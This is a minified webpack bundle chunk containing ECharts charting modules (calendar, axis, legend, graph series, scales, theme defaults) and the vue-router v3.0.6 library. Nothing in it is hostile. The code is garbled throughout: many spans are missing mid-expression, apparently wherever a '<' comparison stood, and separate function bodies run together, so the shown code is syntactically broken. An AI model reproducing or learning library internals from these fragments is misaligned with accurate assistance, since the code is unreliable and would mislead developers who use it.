i=n("6d8b"),r=n("6cb7"),o=n("f934"),a=o.getLayoutParams,s=o.sizeCalculable,l=o.mergeLayoutParam,u=r.extend({type:"calendar",coordinateSystem:null,defaultOption:{zlevel:0,z:2,left:80,top:60,cellSize:20,orient:"horizontal",splitLine:{show:!0,lineStyle:{color:"#000",width:1,type:"solid"}},itemStyle:{color:"#fff",borderWidth:1,borderColor:"#ccc"},dayLabel:{show:!0,firstDay:0,position:"start",margin:"50%",nameMap:"en",color:"#000"},monthLabel:{show:!0,position:"start",margin:5,align:"center",nameMap:"en",formatter:null,color:"#000"},yearLabel:{show:!0,position:null,margin:30,formatter:null,color:"#ccc",fontFamily:"sans-serif",fontWeight:"bolder",fontSize:20}},init:function(e,t,n,i){var r=a(e);u.superApply(this,"init",arguments),c(e,r)},mergeOption:function(e,t){u.superApply(this,"mergeOption",arguments),c(this.option,e)}});function c(e,t){var n=e.cellSize;i.isArray(n)?1===n.length&&(n[1]=n[0]):n=e.cellSize=[n,n];var r=i.map([0,1],(function(e){return s(t,e)&&(n[e]="auto"),null!=n[e]&&"auto"!==n[e]}));l(e,t,{type:"box",ignoreSize:r})}var h=u;e.exports=h},8418:function(e,t,n){"use strict";var i=n("c04e"),r=n("9bf2"),o=n("5c6c");e.exports=function(e,t,n){var a=i(t);a in e?r.f(e,a,o(0,n)):e[a]=n}},"843e":function(e,t,n){var i=n("6d8b"),r=["getDom","getZr","getWidth","getHeight","getDevicePixelRatio","dispatchAction","isDisposed","on","off","getDataURL","getConnectedDataURL","getModel","getOption","getViewOfComponentModel","getViewOfSeriesModel"];function o(e){i.each(r,(function(t){this[t]=i.bind(e[t],e)}),this)}var a=o;e.exports=a},8459:function(e,t,n){var i=n("3eba"),r={type:"axisAreaSelect",event:"axisAreaSelected"};i.registerAction(r,(function(e,t){t.eachComponent({mainType:"parallelAxis",query:e},(function(t){t.axis.model.setActiveIntervals(e.intervals)}))})),i.registerAction("parallelAxisExpand",(function(e,t){t.eachComponent({mainType:"parallel",query:e},(function(t){t.setAxisExpand(e)}))}))},"849b":function(e,t,n){var i=n("d9d0"),r=n("2039");function o(e,t){var n=[];return e.eachComponent("parallel",(function(r,o){var a=new i(r,e,t);a.name="parallel_"+o,a.resize(r,t),r.coordinateSystem=a,a.model=r,n.push(a)})),e.eachSeries((function(t){if("parallel"===t.get("coordinateSystem")){var n=e.queryComponents({mainType:"parallel",index:t.get("parallelIndex"),id:t.get("parallelId")})[0];t.coordinateSystem=n.coordinateSystem}})),n}r.register("parallel",{create:o})},"84ce":function(e,t,n){var i=n("6d8b"),r=i.each,o=i.map,a=n("3842"),s=a.linearMap,l=a.getPixelPrecision,u=a.round,c=n("e073"),h=c.createAxisTicks,d=c.createAxisLabels,f=c.calculateCategoryInterval,p=[0,1],g=function(e,t,n){this.dim=e,this.scale=t,this._extent=n||[0,0],this.inverse=!1,this.onBand=!1};function m(e,t){var n=e[1]-e[0],i=t,r=n/i/2;e[0]+=r,e[1]-=r}function v(e,t,n,i){var o=t.length;if(e.onBand&&!n&&o){var a,s,l=e.getExtent();if(1===o)t[0].coord=l[0],a=t[1]={coord:l[0]};else{var c=t[o-1].tickValue-t[0].tickValue,h=(t[o-1].coord-t[0].coord)/c;r(t,(function(e){e.coord-=h/2}));var d=e.scale.getExtent();s=1+d[1]-t[o-1].tickValue,a={coord:t[o-1].coord+h*s},t.push(a)}var f=l[0]>l[1];p(t[0].coord,l[0])&&(i?t[0].coord=l[0]:t.shift()),i&&p(l[0],t[0].coord)&&t.unshift({coord:l[0]}),p(l[1],a.coord)&&(i?a.coord=l[1]:t.pop()),i&&p(a.coord,l[1])&&t.push({coord:l[1]})}function p(e,t){return e=u(e),t=u(t),f?e>t:e=n&&e<=i},containData:function(e){return this.scale.contain(e)},getExtent:function(){return this._extent.slice()},getPixelPrecision:function(e){return l(e||this.scale.getExtent(),this._extent)},setExtent:function(e,t){var n=this._extent;n[0]=e,n[1]=t},dataToCoord:function(e,t){var n=this._extent,i=this.scale;return e=i.normalize(e),this.onBand&&"ordinal"===i.type&&(n=n.slice(),m(n,i.count())),s(e,p,n,t)},coordToData:function(e,t){var n=this._extent,i=this.scale;this.onBand&&"ordinal"===i.type&&(n=n.slice(),m(n,i.count()));var r=s(e,n,p,t);return this.scale.scale(r)},pointToData:function(e,t){},getTicksCoords:function(e){e=e||{};var t=e.tickModel||this.getTickModel(),n=h(this,t),i=n.ticks,r=o(i,(function(e){return{coord:this.dataToCoord(e),tickValue:e}}),this),a=t.get("alignWithLabel");return v(this,r,a,e.clamp),r},getMinorTicksCoords:function(){if("ordinal"===this.scale.type)return[];var e=this.model.getModel("minorTick"),t=e.get("splitNumber");t>0&&t<100||(t=5);var n=this.scale.getMinorTicks(t),i=o(n,(function(e){return o(e,(function(e){return{coord:this.dataToCoord(e),tickValue:e}}),this)}),this);return i},getViewLabels:function(){return d(this).labels},getLabelModel:function(){return this.model.getModel("axisLabel")},getTickModel:function(){return this.model.getModel("axisTick")},getBandWidth:function(){var e=this._extent,t=this.scale.getExtent(),n=t[1]-t[0]+(this.onBand?1:0);0===n&&(n=1);var i=Math.abs(e[1]-e[0]);return Math.abs(i)/n},isHorizontal:null,getRotate:null,calculateCategoryInterval:function(){return f(this)}};var y=g;e.exports=y},"84d5":function(e,t,n){var i=n("3eba"),r=n("6d8b"),o=n("4319"),a=n("e0d3"),s=a.isNameSpecified,l=n("29a8"),u=l.legend.selector,c={all:{type:"all",title:r.clone(u.all)},inverse:{type:"inverse",title:r.clone(u.inverse)}},h=i.extendComponentModel({type:"legend.plain",dependencies:["series"],layoutMode:{type:"box",ignoreSize:!0},init:function(e,t,n){this.mergeDefaultAndTheme(e,n),e.selected=e.selected||{},this._updateSelector(e)},mergeOption:function(e){h.superCall(this,"mergeOption",e),this._updateSelector(e)},_updateSelector:function(e){var t=e.selector;!0===t&&(t=e.selector=["all","inverse"]),r.isArray(t)&&r.each(t,(function(e,n){r.isString(e)&&(e={type:e}),t[n]=r.merge(e,c[e.type])}))},optionUpdated:function(){this._updateData(this.ecModel);var e=this._data;if(e[0]&&"single"===this.get("selectedMode")){for(var t=!1,n=0;n=0},getOrient:function(){return"vertical"===this.get("orient")?{index:1,name:"vertical"}:{index:0,name:"horizontal"}},defaultOption:{zlevel:0,z:4,show:!0,orient:"horizontal",left:"center",top:0,align:"auto",backgroundColor:"rgba(0,0,0,0)",borderColor:"#ccc",borderRadius:0,borderWidth:0,padding:5,itemGap:10,itemWidth:25,itemHeight:14,inactiveColor:"#ccc",inactiveBorderColor:"#ccc",itemStyle:{borderWidth:0},textStyle:{color:"#333"},selectedMode:!0,selector:!1,selectorLabel:{show:!0,borderRadius:10,padding:[3,5,3,5],fontSize:12,fontFamily:" sans-serif",color:"#666",borderWidth:1,borderColor:"#666"},emphasis:{selectorLabel:{show:!0,color:"#eee",backgroundColor:"#666"}},selectorPosition:"auto",selectorItemGap:7,selectorButtonGap:10,tooltip:{show:!1}}}),d=h;e.exports=d},"84ec":function(e,t){var n=Math.log(2);function i(e,t,r,o,a,s){var l=o+"-"+a,u=e.length;if(s.hasOwnProperty(l))return s[l];if(1===t){var c=Math.round(Math.log((1<l)i.f(e,n=a[l++],t[n]);return e}},"861d":function(e,t){e.exports=function(e){return"object"===typeof e?null!==e:"function"===typeof e}},"862d":function(e,t,n){var i=n("6d8b"),r=i.createHashMap,o=i.each,a=i.isString,s=i.defaults,l=i.extend,u=i.isObject,c=i.clone,h=n("e0d3"),d=h.normalizeToArray,f=n("0f99"),p=f.guessOrdinal,g=f.BE_ORDINAL,m=n("ec6f"),v=n("2f45"),y=v.OTHER_DIMENSIONS,_=n("562e");function b(e,t,n){m.isInstance(t)||(t=m.seriesDataToSource(t)),n=n||{},e=(e||[]).slice();for(var i=(n.dimsDef||[]).slice(),h=r(),f=r(),v=[],b=x(t,e,i,n.dimCount),k=0;kt&&o>i||or?a:0}e.exports=n},"879e":function(e,t,n){var i=n("3eba"),r=n("6179"),o=n("6d8b"),a=n("e0d3"),s=a.defaultEmphasis,l=n("4319"),u=n("eda2"),c=u.encodeHTML,h=n("237f"),d=n("c4a3"),f=n("0c37"),p=f.initCurvenessList,g=f.createEdgeMapForCurveness,m=i.extendSeriesModel({type:"series.graph",init:function(e){m.superApply(this,"init",arguments);var t=this;function n(){return t._categoriesData}this.legendVisualProvider=new d(n,n),this.fillDataTextStyle(e.edges||e.links),this._updateCategoriesData()},mergeOption:function(e){m.superApply(this,"mergeOption",arguments),this.fillDataTextStyle(e.edges||e.links),this._updateCategoriesData()},mergeDefaultAndTheme:function(e){m.superApply(this,"mergeDefaultAndTheme",arguments),s(e,["edgeLabel"],["show"])},getInitialData:function(e,t){var n=e.edges||e.links||[],i=e.data||e.nodes||[],r=this;if(i&&n){p(this);var a=h(i,n,this,!0,s);return o.each(a.edges,(function(e){g(e.node1,e.node2,this,e.dataIndex)}),this),a.data}function s(e,n){e.wrapMethod("getItemModel",(function(e){var t=r._categoriesModels,n=e.getShallow("category"),i=t[n];return i&&(i.parentModel=e.parentModel,e.parentModel=i),e}));var i=r.getModel("edgeLabel"),o=new l({label:i.option},i.parentModel,t),a=r.getModel("emphasis.edgeLabel"),s=new l({emphasis:{label:a.option}},a.parentModel,t);function u(e){return e=this.parsePath(e),e&&"label"===e[0]?o:e&&"emphasis"===e[0]&&"label"===e[1]?s:this.parentModel}n.wrapMethod("getItemModel",(function(e){return e.customizeGetParent(u),e}))}},getGraph:function(){return this.getData().graph},getEdgeData:function(){return this.getGraph().edgeData},getCategoriesData:function(){return this._categoriesData},formatTooltip:function(e,t,n){if("edge"===n){var i=this.getData(),r=this.getDataParams(e,n),o=i.graph.getEdgeByIndex(e),a=i.getName(o.node1.dataIndex),s=i.getName(o.node2.dataIndex),l=[];return null!=a&&l.push(a),null!=s&&l.push(s),l=c(l.join(" > ")),r.value&&(l+=" : "+c(r.value)),l}return m.superApply(this,"formatTooltip",arguments)},_updateCategoriesData:function(){var e=o.map(this.option.categories||[],(function(e){return null!=e.value?e:o.extend({value:0},e)})),t=new r(["value"],this);t.initData(e),this._categoriesData=t,this._categoriesModels=t.mapArray((function(e){return t.getItemModel(e,!0)}))},setZoom:function(e){this.option.zoom=e},setCenter:function(e){this.option.center=e},isAnimationEnabled:function(){return m.superCall(this,"isAnimationEnabled")&&!("force"===this.get("layout")&&this.get("force.layoutAnimation"))},defaultOption:{zlevel:0,z:2,coordinateSystem:"view",legendHoverLink:!0,hoverAnimation:!0,layout:null,focusNodeAdjacency:!1,circular:{rotateLabel:!1},force:{initLayout:null,repulsion:[0,50],gravity:.1,friction:.6,edgeLength:30,layoutAnimation:!0},left:"center",top:"center",symbol:"circle",symbolSize:10,edgeSymbol:["none","none"],edgeSymbolSize:10,edgeLabel:{position:"middle",distance:5},draggable:!1,roam:!1,center:null,zoom:1,nodeScaleRatio:.6,label:{show:!1,formatter:"{b}"},itemStyle:{},lineStyle:{color:"#aaa",width:1,opacity:.5},emphasis:{label:{show:!0}}}}),v=m;e.exports=v},"87a1":function(e,t,n){e.exports=n("0a4f")},"87b1":function(e,t,n){var i=n("cbe5"),r=n("4fac"),o=i.extend({type:"polygon",shape:{points:null,smooth:!1,smoothConstraint:null},buildPath:function(e,t){r.buildPath(e,t,!0)}});e.exports=o},"87c3":function(e,t,n){var i=n("6d8b"),r=i.map,o=n("cccd"),a=n("ee1a"),s=a.isDimensionStacked;function l(e){return{seriesType:e,plan:o(),reset:function(e){var t=e.getData(),n=e.coordinateSystem,i=e.pipelineContext,o=i.large;if(n){var a=r(n.dimensions,(function(e){return t.mapDimension(e)})).slice(0,2),l=a.length,u=t.getCalculationInfo("stackResultDimension");return s(t,a[0])&&(a[0]=u),s(t,a[1])&&(a[1]=u),l&&{progress:c}}function c(e,t){for(var i=e.end-e.start,r=o&&new Float32Array(i*l),s=e.start,u=0,c=[],h=[];s=0?h():c=setTimeout(h,-r),l=i};return d.clear=function(){c&&(clearTimeout(c),c=null)},d.debounceNextCall=function(e){s=e},d}function a(e,t,a,s){var l=e[t];if(l){var u=l[n]||l,c=l[r],h=l[i];if(h!==a||c!==s){if(null==a||!s)return e[t]=u;l=e[t]=o(u,a,"debounce"===s),l[n]=u,l[r]=s,l[i]=a}return l}}function s(e,t){var i=e[t];i&&i[n]&&(e[t]=i[n])}t.throttle=o,t.createOrUpdate=a,t.clear=s},"88f0":function(e,t,n){var i=n("3eba"),r=n("6d8b"),o=i.extendComponentView({type:"marker",init:function(){this.markerGroupMap=r.createHashMap()},render:function(e,t,n){var i=this.markerGroupMap;i.each((function(e){e.__keep=!1}));var r=this.type+"Model";t.eachSeries((function(e){var i=e[r];i&&this.renderSeries(e,i,t,n)}),this),i.each((function(e){!e.__keep&&this.group.remove(e.group)}),this)},renderSeries:function(){}});e.exports=o},8918:function(e,t,n){var i=n("6d8b"),r=n("625e"),o=r.parseClassType,a=0;function s(e){return[e||"",a++,Math.random().toFixed(5)].join("_")}function l(e){var t={};return e.registerSubTypeDefaulter=function(e,n){e=o(e),t[e.main]=n},e.determineSubType=function(n,i){var r=i.type;if(!r){var a=o(n).main;e.hasSubTypes(n)&&t[a]&&(r=t[a](i))}return r},e}function u(e,t){function n(e){var n={},a=[];return i.each(e,(function(s){var l=r(n,s),u=l.originalDeps=t(s),c=o(u,e);l.entryCount=c.length,0===l.entryCount&&a.push(s),i.each(c,(function(e){i.indexOf(l.predecessor,e)<0&&l.predecessor.push(e);var t=r(n,e);i.indexOf(t.successor,e)<0&&t.successor.push(s)}))})),{graph:n,noEntryList:a}}function r(e,t){return e[t]||(e[t]={predecessor:[],successor:[]}),e[t]}function o(e,t){var n=[];return i.each(e,(function(e){i.indexOf(t,e)>=0&&n.push(e)})),n}e.topologicalTravel=function(e,t,r,o){if(e.length){var a=n(t),s=a.graph,l=a.noEntryList,u={};i.each(e,(function(e){u[e]=!0}));while(l.length){var c=l.pop(),h=s[c],d=!!u[c];d&&(r.call(o,c,h.originalDeps.slice()),delete u[c]),i.each(h.successor,d?p:f)}i.each(u,(function(){throw new Error("Circle dependency may exists")}))}function f(e){s[e].entryCount--,0===s[e].entryCount&&l.push(e)}function p(e){u[e]=!0,f(e)}}}t.getUID=s,t.enableSubTypeDefaulter=l,t.enableTopologicalTravel=u},8925:function(e,t,n){var i=n("c6cd"),r=Function.toString;"function"!=typeof i.inspectSource&&(i.inspectSource=function(e){return r.call(e)}),e.exports=i.inspectSource},8971:function(e,t){var n="";"undefined"!==typeof navigator&&(n=navigator.platform||"");var i={color:["#c23531","#2f4554","#61a0a8","#d48265","#91c7ae","#749f83","#ca8622","#bda29a","#6e7074","#546570","#c4ccd3"],gradientColor:["#f6efa6","#d88273","#bf444c"],textStyle:{fontFamily:n.match(/^Win/)?"Microsoft YaHei":"sans-serif",fontSize:12,fontStyle:"normal",fontWeight:"normal"},blendMode:null,animation:"auto",animationDuration:1e3,animationDurationUpdate:300,animationEasing:"exponentialOut",animationEasingUpdate:"cubicOut",animationThreshold:2e3,progressiveThreshold:3e3,progressive:400,hoverLayerThreshold:3e3,useUTC:!1};e.exports=i},"897a":function(e,t,n){var i=n("22d1"),r=[["shadowBlur",0],["shadowColor","#000"],["shadowOffsetX",0],["shadowOffsetY",0]];function o(e){return i.browser.ie&&i.browser.version>=11?function(){var t,n=this.__clipPaths,i=this.style;if(n)for(var o=0;ot[1]&&(t[1]=e[1]),l.prototype.setExtent.call(this,t[0],t[1])},getInterval:function(){return this._interval},setInterval:function(e){this._interval=e,this._niceExtent=this._extent.slice(),this._intervalPrecision=a.getIntervalPrecision(e)},getTicks:function(e){var t=this._interval,n=this._extent,i=this._niceExtent,r=this._intervalPrecision,o=[];if(!t)return o;var a=1e4;n[0]a)return[]}var u=o.length?o[o.length-1]:i[1];return n[1]>u&&(e?o.push(s(u+t,r)):o.push(n[1])),o},getMinorTicks:function(e){for(var t=this.getTicks(!0),n=[],r=this.getExtent(),o=1;or[0]&&d0)i*=10;var a=[o.round(d(t[0]/i)*i),o.round(h(t[1]/i)*i)];this._interval=i,this._niceExtent=a}},niceExtent:function(e){l.niceExtent.call(this,e);var t=this._originalScale;t.__fixMin=e.fixMin,t.__fixMax=e.fixMax}});function m(e,t){return c(e,u(t))}i.each(["contain","normalize"],(function(e){g.prototype[e]=function(t){return t=p(t)/p(this.base),s[e].call(this,t)}})),g.create=function(){return new g};var v=g;e.exports=v},"8c4f":function(e,t,n){"use strict"; +/*! + * vue-router v3.0.6 + * (c) 2019 Evan You + * @license MIT + */function i(e,t){0}function r(e){return Object.prototype.toString.call(e).indexOf("Error")>-1}function o(e,t){for(var n in t)e[n]=t[n];return e}var a={name:"RouterView",functional:!0,props:{name:{type:String,default:"default"}},render:function(e,t){var n=t.props,i=t.children,r=t.parent,a=t.data;a.routerView=!0;var l=r.$createElement,u=n.name,c=r.$route,h=r._routerViewCache||(r._routerViewCache={}),d=0,f=!1;while(r&&r._routerRoot!==r){var p=r.$vnode&&r.$vnode.data;p&&(p.routerView&&d++,p.keepAlive&&r._inactive&&(f=!0)),r=r.$parent}if(a.routerViewDepth=d,f)return l(h[u],a,i);var g=c.matched[d];if(!g)return h[u]=null,l();var m=h[u]=g.components[u];a.registerRouteInstance=function(e,t){var n=g.instances[u];(t&&n!==e||!t&&n===e)&&(g.instances[u]=t)},(a.hook||(a.hook={})).prepatch=function(e,t){g.instances[u]=t.componentInstance},a.hook.init=function(e){e.data.keepAlive&&e.componentInstance&&e.componentInstance!==g.instances[u]&&(g.instances[u]=e.componentInstance)};var v=a.props=s(c,g.props&&g.props[u]);if(v){v=a.props=o({},v);var y=a.attrs=a.attrs||{};for(var _ in v)m.props&&_ in m.props||(y[_]=v[_],delete v[_])}return l(m,a,i)}};function s(e,t){switch(typeof t){case"undefined":return;case"object":return t;case"function":return t(e);case"boolean":return t?e.params:void 0;default:0}}var l=/[!'()*]/g,u=function(e){return"%"+e.charCodeAt(0).toString(16)},c=/%2C/g,h=function(e){return encodeURIComponent(e).replace(l,u).replace(c,",")},d=decodeURIComponent;function f(e,t,n){void 0===t&&(t={});var i,r=n||p;try{i=r(e||"")}catch(a){i={}}for(var o in t)i[o]=t[o];return i}function p(e){var t={};return e=e.trim().replace(/^(\?|#|&)/,""),e?(e.split("&").forEach((function(e){var n=e.replace(/\+/g," ").split("="),i=d(n.shift()),r=n.length>0?d(n.join("=")):null;void 0===t[i]?t[i]=r:Array.isArray(t[i])?t[i].push(r):t[i]=[t[i],r]})),t):t}function g(e){var t=e?Object.keys(e).map((function(t){var n=e[t];if(void 0===n)return"";if(null===n)return h(t);if(Array.isArray(n)){var i=[];return n.forEach((function(e){void 0!==e&&(null===e?i.push(h(t)):i.push(h(t)+"="+h(e)))})),i.join("&")}return h(t)+"="+h(n)})).filter((function(e){return e.length>0})).join("&"):null;return t?"?"+t:""}var m=/\/?$/;function v(e,t,n,i){var r=i&&i.options.stringifyQuery,o=t.query||{};try{o=y(o)}catch(s){}var a={name:t.name||e&&e.name,meta:e&&e.meta||{},path:t.path||"/",hash:t.hash||"",query:o,params:t.params||{},fullPath:x(t,r),matched:e?b(e):[]};return n&&(a.redirectedFrom=x(n,r)),Object.freeze(a)}function y(e){if(Array.isArray(e))return e.map(y);if(e&&"object"===typeof e){var t={};for(var n in e)t[n]=y(e[n]);return t}return e}var _=v(null,{path:"/"});function b(e){var t=[];while(e)t.unshift(e),e=e.parent;return t}function x(e,t){var n=e.path,i=e.query;void 0===i&&(i={});var r=e.hash;void 0===r&&(r="");var o=t||g;return(n||"/")+o(i)+r}function w(e,t){return t===_?e===t:!!t&&(e.path&&t.path?e.path.replace(m,"")===t.path.replace(m,"")&&e.hash===t.hash&&k(e.query,t.query):!(!e.name||!t.name)&&(e.name===t.name&&e.hash===t.hash&&k(e.query,t.query)&&k(e.params,t.params)))}function k(e,t){if(void 0===e&&(e={}),void 0===t&&(t={}),!e||!t)return e===t;var n=Object.keys(e),i=Object.keys(t);return n.length===i.length&&n.every((function(n){var i=e[n],r=t[n];return"object"===typeof i&&"object"===typeof r?k(i,r):String(i)===String(r)}))}function S(e,t){return 0===e.path.replace(m,"/").indexOf(t.path.replace(m,"/"))&&(!t.hash||e.hash===t.hash)&&M(e.query,t.query)}function M(e,t){for(var n in t)if(!(n in e))return!1;return!0}var A,C=[String,Object],T=[String,Array],I={name:"RouterLink",props:{to:{type:C,required:!0},tag:{type:String,default:"a"},exact:Boolean,append:Boolean,replace:Boolean,activeClass:String,exactActiveClass:String,event:{type:T,default:"click"}},render:function(e){var t=this,n=this.$router,i=this.$route,r=n.resolve(this.to,i,this.append),a=r.location,s=r.route,l=r.href,u={},c=n.options.linkActiveClass,h=n.options.linkExactActiveClass,d=null==c?"router-link-active":c,f=null==h?"router-link-exact-active":h,p=null==this.activeClass?d:this.activeClass,g=null==this.exactActiveClass?f:this.exactActiveClass,m=a.path?v(null,a,null,n):s;u[g]=w(i,m),u[p]=this.exact?u[g]:S(i,m);var y=function(e){D(e)&&(t.replace?n.replace(a):n.push(a))},_={click:D};Array.isArray(this.event)?this.event.forEach((function(e){_[e]=y})):_[this.event]=y;var b={class:u};if("a"===this.tag)b.on=_,b.attrs={href:l};else{var x=L(this.$slots.default);if(x){x.isStatic=!1;var k=x.data=o({},x.data);k.on=_;var M=x.data.attrs=o({},x.data.attrs);M.href=l}else b.on=_}return e(this.tag,b,this.$slots.default)}};function D(e){if(!(e.metaKey||e.altKey||e.ctrlKey||e.shiftKey)&&!e.defaultPrevented&&(void 0===e.button||0===e.button)){if(e.currentTarget&&e.currentTarget.getAttribute){var t=e.currentTarget.getAttribute("target");if(/\b_blank\b/i.test(t))return}return e.preventDefault&&e.preventDefault(),!0}}function L(e){if(e)for(var t,n=0;n=0&&(t=e.slice(i),e=e.slice(0,i));var r=e.indexOf("?");return r>=0&&(n=e.slice(r+1),e=e.slice(0,r)),{path:e,query:n,hash:t}}function N(e){return e.replace(/\/\//g,"/")}var z=Array.isArray||function(e){return"[object Array]"==Object.prototype.toString.call(e)},F=ie,V=G,B=W,j=Z,H=ne,q=new RegExp(["(\\\\.)","([\\/.])?(?:(?:\\:(\\w+)(?:\\(((?:\\\\.|[^\\\\()])+)\\))?|\\(((?:\\\\.|[^\\\\()])+)\\))([+*?])?|(\\*))"].join("|"),"g");function G(e,t){var n,i=[],r=0,o=0,a="",s=t&&t.delimiter||"/";while(null!=(n=q.exec(e))){var l=n[0],u=n[1],c=n.index;if(a+=e.slice(o,c),o=c+l.length,u)a+=u[1];else{var h=e[o],d=n[2],f=n[3],p=n[4],g=n[5],m=n[6],v=n[7];a&&(i.push(a),a="");var y=null!=d&&null!=h&&h!==d,_="+"===m||"*"===m,b="?"===m||"*"===m,x=n[2]||s,w=p||g;i.push({name:f||r++,prefix:d||"",delimiter:x,optional:b,repeat:_,partial:y,asterisk:!!v,pattern:w?X(w):v?".*":"[^"+Y(x)+"]+?"})}}return o-1&&(s.params[d]=n.params[d]);if(u)return s.path=oe(u.path,s.params,'named route "'+l+'"'),c(u,s,a)}else if(s.path){s.params={};for(var f=0;f=e.length?n():e[r]?t(e[r],(function(){i(r+1)})):i(r+1)};i(0)}function Pe(e){return function(t,n,i){var o=!1,a=0,s=null;Re(e,(function(e,t,n,l){if("function"===typeof e&&void 0===e.cid){o=!0,a++;var u,c=Ve((function(t){Fe(t)&&(t=t.default),e.resolved="function"===typeof t?t:A.extend(t),n.components[l]=t,a--,a<=0&&i()})),h=Ve((function(e){var t="Failed to resolve async component "+l+": "+e;s||(s=r(e)?e:new Error(t),i(s))}));try{u=e(c,h)}catch(f){h(f)}if(u)if("function"===typeof u.then)u.then(c,h);else{var d=u.component;d&&"function"===typeof d.then&&d.then(c,h)}}})),o||i()}}function Re(e,t){return Ne(e.map((function(e){return Object.keys(e.components).map((function(n){return t(e.components[n],e.instances[n],e,n)}))})))}function Ne(e){return Array.prototype.concat.apply([],e)}var ze="function"===typeof Symbol&&"symbol"===typeof Symbol.toStringTag;function Fe(e){return e.__esModule||ze&&"Module"===e[Symbol.toStringTag]}function Ve(e){var t=!1;return function(){var n=[],i=arguments.length;while(i--)n[i]=arguments[i];if(!t)return t=!0,e.apply(this,n)}}var Be=function(e,t){this.router=e,this.base=je(t),this.current=_,this.pending=null,this.ready=!1,this.readyCbs=[],this.readyErrorCbs=[],this.errorCbs=[]};function je(e){if(!e)if(O){var t=document.querySelector("base");e=t&&t.getAttribute("href")||"/",e=e.replace(/^https?:\/\/[^\/]+/,"")}else e="/";return"/"!==e.charAt(0)&&(e="/"+e),e.replace(/\/$/,"")}function He(e,t){var n,i=Math.max(e.length,t.length);for(n=0;n-1?decodeURI(e.slice(0,i))+e.slice(i):decodeURI(e)}else n>-1&&(e=decodeURI(e.slice(0,n))+e.slice(n));return e}function it(e){var t=window.location.href,n=t.indexOf("#"),i=n>=0?t.slice(0,n):t;return i+"#"+e}function rt(e){Me?Le(it(e)):window.location.hash=e}function ot(e){Me?Ee(it(e)):window.location.replace(it(e))}var at=function(e){function t(t,n){e.call(this,t,n),this.stack=[],this.index=-1}return e&&(t.__proto__=e),t.prototype=Object.create(e&&e.prototype),t.prototype.constructor=t,t.prototype.push=function(e,t,n){var i=this;this.transitionTo(e,(function(e){i.stack=i.stack.slice(0,i.index+1).concat(e),i.index++,t&&t(e)}),n)},t.prototype.replace=function(e,t,n){var i=this;this.transitionTo(e,(function(e){i.stack=i.stack.slice(0,i.index).concat(e),t&&t(e)}),n)},t.prototype.go=function(e){var t=this,n=this.index+e;if(!(n<0||n>=this.stack.length)){var i=this.stack[n];this.confirmTransition(i,(function(){t.index=n,t.updateRoute(i)}))}},t.prototype.getCurrentLocation=function(){var e=this.stack[this.stack.length-1];return e?e.fullPath:"/"},t.prototype.ensureURL=function(){},t}(Be),st=function(e){void 0===e&&(e={}),this.app=null,this.apps=[],this.options=e,this.beforeHooks=[],this.resolveHooks=[],this.afterHooks=[],this.matcher=he(e.routes||[],this);var t=e.mode||"hash";switch(this.fallback="history"===t&&!Me&&!1!==e.fallback,this.fallback&&(t="hash"),O||(t="abstract"),this.mode=t,t){case"history":this.history=new Ke(this,e.base);break;case"hash":this.history=new Qe(this,e.base,this.fallback);break;case"abstract":this.history=new at(this,e.base);break;default:0}},lt={currentRoute:{configurable:!0}};function ut(e,t){return e.push(t),function(){var n=e.indexOf(t);n>-1&&e.splice(n,1)}}function ct(e,t,n){var i="hash"===n?"#"+t:t;return e?N(e+"/"+i):i}st.prototype.match=function(e,t,n){return this.matcher.match(e,t,n)},lt.currentRoute.get=function(){return this.history&&this.history.current},st.prototype.init=function(e){var t=this;if(this.apps.push(e),e.$once("hook:destroyed",(function(){var n=t.apps.indexOf(e);n>-1&&t.apps.splice(n,1),t.app===e&&(t.app=t.apps[0]||null)})),!this.app){this.app=e;var n=this.history;if(n instanceof Ke)n.transitionTo(n.getCurrentLocation());else if(n instanceof Qe){var i=function(){n.setupListeners()};n.transitionTo(n.getCurrentLocation(),i,i)}n.listen((function(e){t.apps.forEach((function(t){t._route=e}))}))}},st.prototype.beforeEach=function(e){return ut(this.beforeHooks,e)},st.prototype.beforeResolve=function(e){return ut(this.resolveHooks,e)},st.prototype.afterEach=function(e){return ut(this.afterHooks,e)},st.prototype.onReady=function(e,t){this.history.onReady(e,t)},st.prototype.onError=function(e){this.history.onError(e)},st.prototype.push=function(e,t,n){this.history.push(e,t,n)},st.prototype.replace=function(e,t,n){this.history.replace(e,t,n)},st.prototype.go=function(e){this.history.go(e)},st.prototype.back=function(){this.go(-1)},st.prototype.forward=function(){this.go(1)},st.prototype.getMatchedComponents=function(e){var t=e?e.matched?e:this.resolve(e).route:this.currentRoute;return t?[].concat.apply([],t.matched.map((function(e){return Object.keys(e.components).map((function(t){return e.components[t]}))}))):[]},st.prototype.resolve=function(e,t,n){t=t||this.history.current;var i=ce(e,t,n,this),r=this.match(i,t),o=r.redirectedFrom||r.fullPath,a=this.history.base,s=ct(a,o,this.mode);return{location:i,route:r,href:s,normalizedTo:i,resolved:r}},st.prototype.addRoutes=function(e){this.matcher.addRoutes(e),this.history.current!==_&&this.history.transitionTo(this.history.getCurrentLocation())},Object.defineProperties(st.prototype,lt),st.install=E,st.version="3.0.6",O&&window.Vue&&window.Vue.use(st),t["a"]=st},"8d32":function(e,t,n){var i=n("cbe5"),r=i.extend({type:"arc",shape:{cx:0,cy:0,r:0,startAngle:0,endAngle:2*Math.PI,clockwise:!0},style:{stroke:"#000",fill:null},buildPath:function(e,t){var n=t.cx,i=t.cy,r=Math.max(t.r,0),o=t.startAngle,a=t.endAngle,s=t.clockwise,l=Math.cos(o),u=Math.sin(o);e.moveTo(l*r+n,u*r+i),e.arc(n,i,r,o,a,!s)}});e.exports=r},"8deb":function(e,t,n){var i=n("3eba");n("5522"),n("a016"),n("1466");var r=n("98e7"),o=n("7f96"),a=n("870e"),s=n("d3f4"),l=n("7891");i.registerVisual(r("radar")),i.registerVisual(o("radar","circle")),i.registerLayout(a),i.registerProcessor(s("radar")),i.registerPreprocessor(l)},"8e43":function(e,t,n){var i=n("6d8b"),r=i.createHashMap,o=i.isObject,a=i.map;function s(e){this.categories=e.categories||[],this._needCollect=e.needCollect,this._deduplication=e.deduplication,this._map}s.createByAxisModel=function(e){var t=e.option,n=t.data,i=n&&a(n,c);return new s({categories:i,needCollect:!i,deduplication:!1!==t.dedplication})};var l=s.prototype;function u(e){return e._map||(e._map=r(e.categories))}function c(e){return o(e)&&null!=e.value?e.value:e+""}l.getOrdinal=function(e){return u(this).get(e)},l.parseAndCollect=function(e){var t,n=this._needCollect;if("string"!==typeof e&&!n)return e;if(n&&!this._deduplication)return t=this.categories.length,this.categories[t]=e,t;var i=u(this);return 